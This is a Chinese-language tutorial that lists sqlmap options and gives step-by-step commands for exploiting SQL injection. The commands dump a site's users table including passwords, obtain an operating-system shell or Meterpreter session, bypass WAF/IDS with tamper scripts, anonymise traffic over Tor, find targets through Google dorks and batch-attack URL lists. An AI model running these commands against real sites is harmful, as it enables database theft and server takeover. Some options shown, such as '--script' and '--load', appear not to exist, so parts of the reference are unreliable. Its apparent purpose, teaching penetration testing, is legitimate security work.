2024最新的最全面基本sqlmap使用命令

本文主要是介绍2024最新的最全面基本sqlmap使用命令，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

sqlmap 是一个广泛使用的开源渗透测试工具，专门用于自动化检测和利用 SQL 注入漏洞。以下是对您列出的每个字段的详细举例说明：

基础帮助和版本

-h, --help：显示基本的帮助信息并退出。这对于快速查看最常用的选项非常有用。
-hh：显示高级帮助信息并退出。这包括更详细的选项描述和示例。
--version：显示程序的版本号并退出。这有助于确认您正在使用的 sqlmap 版本。

目标（Target）

-u URL, --url=URL：指定目标 URL。例如，"http://www.site.com/vuln.php?id=1"，这通常是一个包含潜在 SQL 注入点的 URL。
-g GOOGLEDORK：处理 Google Dork 结果作为目标 URL。Google Dork 是一种搜索查询，用于在 Google 上查找可能包含漏洞的网站。

请求（Request）

--data=DATA：通过 POST 请求发送的数据字符串。例如，"id=1"，这在测试需要 POST 请求的表单时非常有用。
--cookie=COOKIE：HTTP Cookie 头的值。例如，"PHPSESSID=a8d127e.."，这对于需要会话认证的网站是必要的。
--random-agent：使用随机选择的 HTTP User-Agent 头值，以避免被网站通过 User-Agent 识别为自动化工具。
--proxy=PROXY：使用代理连接到目标 URL。这有助于绕过 IP 地址封锁或进行匿名测试。
--tor：使用 Tor 匿名网络。这有助于保持匿名性。
--check-tor：检查是否正确使用了 Tor。

注入（Injection）

-p TESTPARAMETER：指定要测试的参数。如果 URL 中有多个参数，您可以选择测试其中的特定一个或多个。
--dbms=DBMS：强制后端数据库管理系统（DBMS）为指定值。这有助于 sqlmap 更准确地识别目标 DBMS。

检测（Detection）

--level=LEVEL：设置执行的测试级别（1-5，默认为 1）。级别越高，执行的测试越彻底，但可能需要更长时间。
--risk=RISK：设置执行测试的风险级别（1-3，默认为 1）。风险级别越高，执行的测试可能越危险，如尝试修改数据库结构或数据。

技术（Techniques）

--technique=TECH..：指定要使用的 SQL 注入技术（默认为 "BEUSTQ"）。这允许您根据目标的防御机制选择最合适的技术。

枚举（Enumeration）

-a, --all：检索所有可能的信息，包括数据库、表、列和数据。
-b, --banner：检索 DBMS 的 banner 信息。
--current-user：检索 DBMS 的当前用户。
--current-db：检索 DBMS 的当前数据库。
--passwords：枚举 DBMS 用户的密码哈希。
--dbs：枚举 DBMS 中的数据库。
--tables：枚举数据库中的表。
--columns：枚举表中的列。
--schema：枚举 DBMS 的架构。
--dump：转储指定数据库表的条目。
--dump-all：转储所有数据库表的条目。
-D DB：指定要枚举的 DBMS 数据库。
-T TBL：指定要枚举的 DBMS 数据库表。
-C COL：指定要枚举的 DBMS 数据库表列。

操作系统访问

--os-shell：请求一个交互式操作系统 shell。
--os-pwn：请求一个 out-of-band shell、Meterpreter 或 VNC，以便在底层操作系统上执行更高级的命令。

一般（General）

--batch：从不请求用户输入，使用默认行为。这对于自动化脚本非常有用。
--flush-session：为当前目标刷新会话文件。这有助于清理旧的测试数据。

其他（Miscellaneous）

--wizard：为初学者用户提供简单的向导界面。这有助于新用户更容易地开始使用 sqlmap。

使用示例

要查看完整的选项列表，可以运行 sqlmap.py -hh。例如，要测试 URL http://www.site.com/vuln.php?id=1 的 id 参数是否存在 SQL 注入漏洞，可以使用以下命令：

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -p id

混合使用

当然，我可以为你生成一些详细组合使用的sqlmap命令示例，涵盖不同的使用场景。请注意，由于sqlmap的选项非常丰富，我将选取几个典型的用例来展示。

1. 基本扫描

扫描单个URL

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --level=3 --risk=2

这个命令将扫描指定的URL，使用中等测试级别（3）和中等风险级别（2）来寻找SQL注入漏洞。

2. 使用POST数据

发送POST请求

bash复制代码

sqlmap.py -u "http://www.site.com/login.php" --data="username=admin&password=123456" --level=3 --risk=3

这个命令通过POST方法发送用户名和密码，并使用高级别（3）和高风险（3）进行扫描。

3. 枚举数据库信息

枚举所有数据库

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbs --batch

使用--dbs选项枚举后端数据库的所有数据库名，并启用--batch选项以避免任何交互式提示。

枚举特定数据库中的表

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb --tables --batch

指定数据库usersdb并枚举其所有表。

导出特定表的数据

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb -T users --dump --batch

导出usersdb数据库中users表的所有数据。

4. 使用代理和Tor

通过Tor进行扫描

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --tor --check-tor --level=5

使用Tor匿名网络进行扫描，并检查Tor是否正确配置。

使用自定义代理

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" --level=4

通过本地代理（例如Burp Suite）进行扫描。

5. 自定义请求头

自定义User-Agent

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --level=3

每次请求使用随机的User-Agent头进行扫描。

添加Cookie

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --cookie="PHPSESSID=a8d127e.." --level=2

添加自定义的Cookie头进行扫描。

6. 自定义注入测试

指定测试参数

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1&user=admin" -p "id,user" --level=5

指定id和user两个参数进行测试。

强制DBMS

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbms=MySQL --level=4

强制后端数据库为MySQL并进行扫描。

这些示例应该能够涵盖sqlmap的一些常用和高级用法。请根据你的具体需求进行调整。

通过代理进行注入测试

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"

绕过WAF/IDS的检测

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"

批量处理多个URL

bash复制代码

sqlmap -m targets.txt

其中targets.txt包含多个目标URL，每行一个。

7.自动化与脚本化

使用自定义脚本

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --script=my_custom_script.py

批量自动化测试

结合shell脚本或Python脚本，批量调用sqlmap命令，处理大量目标。

8.高级特性与技巧

获取操作系统访问权限

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --os-shell

或

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --os-pwn

调试模式

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --debug

保存和恢复会话

bash复制代码

	`sqlmap -u "http://example.com/vuln.php?id=1" --save=session.sqlmap`
	`sqlmap --load=session.sqlmap`

9.实战案例

实战案例1：检测并枚举目标

bash复制代码

	`# 第一步：检测SQL注入`
	`sqlmap -u "http://example.com/vuln.php?id=1"`
	`# 第二步：枚举所有数据库`
	`sqlmap -u "http://example.com/vuln.php?id=1" --dbs`
	`# 第三步：枚举特定数据库的所有表`
	`sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db --tables`
	`# 第四步：导出特定表的数据`
	`sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db -T users -C "username,password" --dump`

实战案例2：自动化测试多个目标

bash复制代码

	`# 编写shell脚本，遍历targets.txt中的每个URL，使用sqlmap进行测试`
	`#!/bin/bash`
	`while read url; do`
	`sqlmap -u "$url" --dbs`
	`done < targets.txt`

这篇关于2024最新的最全面基本sqlmap使用命令的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

2024最新的最全面基本sqlmap使用命令

基础帮助和版本

目标（Target）

请求（Request）

注入（Injection）

检测（Detection）

技术（Techniques）

枚举（Enumeration）

操作系统访问

一般（General）

其他（Miscellaneous）

使用示例

混合使用

1. 基本扫描

扫描单个URL

2. 使用POST数据

发送POST请求

3. 枚举数据库信息

枚举所有数据库

枚举特定数据库中的表

导出特定表的数据

4. 使用代理和Tor

通过Tor进行扫描

使用自定义代理

5. 自定义请求头

自定义User-Agent

添加Cookie

6. 自定义注入测试

指定测试参数

强制DBMS

通过代理进行注入测试

绕过WAF/IDS的检测

批量处理多个URL

7.自动化与脚本化

使用自定义脚本

批量自动化测试

8.高级特性与技巧

获取操作系统访问权限

调试模式

保存和恢复会话

9.实战案例

实战案例1：检测并枚举目标

实战案例2：自动化测试多个目标

相关文章